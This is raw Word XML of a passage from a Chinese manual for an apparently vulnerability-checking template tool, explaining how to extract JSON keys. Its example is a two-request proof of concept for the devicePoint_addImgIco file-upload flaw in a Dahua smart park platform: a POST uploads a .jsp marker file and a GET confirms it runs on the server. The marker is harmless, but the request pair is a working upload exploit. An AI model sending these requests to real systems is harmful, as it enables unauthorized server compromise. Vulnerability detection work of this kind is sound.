          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="0E2841" w:themeColor="text2"/>
        </w:rPr>
        <w:t>son的键取值</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="0EF66B07" w14:textId="6F1CA910" w:rsidR="008A3D6E" w:rsidRDefault="008A3D6E" w:rsidP="008A3D6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>son就很简单了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DAADBE" w14:textId="5447F683" w:rsidR="008A3D6E" w:rsidRDefault="008A3D6E" w:rsidP="008A3D6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3D6E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大华智慧园区综合管理平台文件</w:t>
      </w:r>
      <w:r w:rsidRPr="008A3D6E">
        <w:t>devicePoint_addImgIco文件上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞进行举例说明。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338A4434" w14:textId="72010554" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="008A3D6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E95F9A">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>请求体1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5F9A" w14:paraId="3C912B02" w14:textId="77777777" w:rsidTr="00E95F9A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EC4A2BD" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18A3F21F" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Host: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648C5159" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7619A51C" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50E024F2" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Content-Length: 249</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41F648D5" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2054E2F4" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="739380BB" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7CBE7AD1" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="327AB1EB" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Content-Disposition: form-data; name="upload"; filename="B5FJnD.jsp"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28083FF1" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Content-Type: application/octet-stream</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F89C389" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Content-Transfer-Encoding: binary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="431F4772" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2204B0BD" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>5f8be5deb136b12c15bd8a1732a95a22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28FD11B6" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D735503" w14:textId="0F9D3ECC" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2741E61F" w14:textId="3FF8486F" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="008A3D6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E95F9A">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>返回体1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3D6E" w14:paraId="76D033B2" w14:textId="77777777" w:rsidTr="008A3D6E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="425A9FD0" w14:textId="77777777" w:rsidR="008A3D6E" w:rsidRDefault="008A3D6E" w:rsidP="008A3D6E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29B1B9CB" w14:textId="77777777" w:rsidR="008A3D6E" w:rsidRDefault="008A3D6E" w:rsidP="008A3D6E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "body": ".jsp",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2231624F" w14:textId="77777777" w:rsidR="008A3D6E" w:rsidRDefault="008A3D6E" w:rsidP="008A3D6E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3D6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> "json": "jsp:data"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27836541" w14:textId="5B954810" w:rsidR="008A3D6E" w:rsidRDefault="008A3D6E" w:rsidP="008A3D6E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34A21A8D" w14:textId="0C50D52D" w:rsidR="008A3D6E" w:rsidRDefault="00E95F9A" w:rsidP="008A3D6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E95F9A">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>请求体2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5F9A" w14:paraId="610B9935" w14:textId="77777777" w:rsidTr="00E95F9A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CCBC897" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>GET /upload/emap/society_new/</w:t>
            </w:r>
            <w:r w:rsidRPr="00E95F9A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>{{jsp}}</w:t>
            </w:r>
            <w:r w:rsidRPr="00E95F9A">
              <w:t xml:space="preserve"> HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10DB2E63" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>Host:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="438F4429" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A36BB93" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C6D8B5" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77747D94" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>Accept-Encoding: gzip, deflate, br, zstd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B029133" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>Connection: keep-alive</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C8923E0" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>Upgrade-Insecure-Requests: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743213C0" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>Sec-Fetch-Dest: document</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="402CA29D" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>Sec-Fetch-Mode: navigate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B67303D" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>Sec-Fetch-Site: none</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B2476A" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>Sec-Fetch-User: ?1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C631AE5" w14:textId="226A6A47" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:lastRenderedPageBreak/>
              <w:t>Priority: u=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E3384B6" w14:textId="3A6313C7" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="008A3D6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回体2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5F9A" w14:paraId="542468EA" w14:textId="77777777" w:rsidTr="00E95F9A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C09E24A" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="423AE748" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t xml:space="preserve">    "body": "5f8be5deb136b12c15bd8a1732a95a22",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68C78A0C" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRPr="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t xml:space="preserve">    "status_code": 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D104498" w14:textId="4A07E6D8" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="794D0CA0" w14:textId="3801B1E0" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的json数据中，取出data键的值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7E750C" w14:textId="6DCB7395" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00FC20C9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="311DFE69" wp14:editId="7783A42D">
            <wp:extent cx="5274310" cy="2609850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="495938054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38054" name="图片 1" descr="图形用户界面, 应用程序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5F9A" w14:paraId="33A22A20" w14:textId="77777777" w:rsidTr="00E95F9A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2014C626" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58025A66" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "body": ".jsp",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D52D68A" w14:textId="77777777" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3D6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> "json": "jsp:data"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60979E56" w14:textId="1DFD6405" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="599B59D7" w14:textId="7A8977A8" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中json的意思是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E95F9A" w14:paraId="5B9565DA" w14:textId="77777777" w:rsidTr="00E95F9A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55F39D44" w14:textId="60DC6BF5" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00FF09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jsp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6458" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DE52A51" w14:textId="7D1CB656" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>变量名称，随便写</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95F9A" w14:paraId="0DA2C423" w14:textId="77777777" w:rsidTr="00E95F9A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D7142ED" w14:textId="6E653589" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00FF09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6458" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D2132B2" w14:textId="0E828004" w:rsidR="00E95F9A" w:rsidRDefault="00E95F9A" w:rsidP="00E95F9A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>要取的json数据，也就是取上面的</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00E95F9A">
              <w:t>ico_res_95e7990f3095_on.jsp</w:t>
            </w:r>
            <w:r w:rsidR="00FF0906">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>“文件名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="111D4600" w14:textId="77777777" w:rsidR="00145F0E" w:rsidRDefault="00145F0E" w:rsidP="00E95F9A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="179CFBB9" w14:textId="17D67692" w:rsidR="00FF0906" w:rsidRDefault="00FF0906" w:rsidP="00FF0906">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0906">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>三，命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>的使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D4F956" w14:textId="44F12007" w:rsidR="00FF0906" w:rsidRDefault="00FF0906" w:rsidP="00FF0906">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF0906">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>3.1 测试辅助</w:t>
      </w:r>
      <w:r w:rsidR="007916F4">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF0906">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>命令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FF0906" w14:paraId="1F780E7B" w14:textId="77777777" w:rsidTr="00FF0906">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="291E13FB" w14:textId="4ED16153" w:rsidR="00FF0906" w:rsidRDefault="00FF0906" w:rsidP="00FF0906">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>-body</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6883" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01F141DB" w14:textId="4B6E1677" w:rsidR="00FF0906" w:rsidRDefault="00FF0906" w:rsidP="00FF0906">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>返回网站的信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF0906" w14:paraId="6E2CA126" w14:textId="77777777" w:rsidTr="00FF0906">
        <w:tc>
